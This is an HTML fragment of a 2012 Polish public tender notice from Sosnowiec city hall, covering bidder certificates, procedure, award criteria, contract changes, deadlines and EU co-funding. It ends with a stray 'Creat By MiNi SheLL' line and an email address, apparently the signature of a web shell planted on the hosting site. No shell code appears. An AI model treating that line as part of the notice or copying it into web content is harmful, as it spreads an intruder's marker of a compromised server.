<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>brak</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br> - wystąpienia -siły wyższej-, przy czym -siła wyższa- oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu. Wydarzenia takie mogą obejmować w szczególności: wojny, pożary, powodzie, embarga przewozowe, strajki oraz oficjalne decyzje organów władzy państwowej, 
<br> - zmiana końcowego terminu realizacji umowy - może ulec zmianie w przypadku zmiany harmonogramu realizacji projektu będącego załącznikiem umowy o dofinansowanie zawartej przez Zamawiającego z instytucją współfinansującą,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Sosnowiec Al. Zwycięstwa 20 41-200 Wydział Rozwoju i Funduszy Europejskich pok 010.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 12:00, miejsce: Urząd Miasta i Gminy Sosnowiec Al. Zwycięstwa 20 41-200, pokój nr 503 CD.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com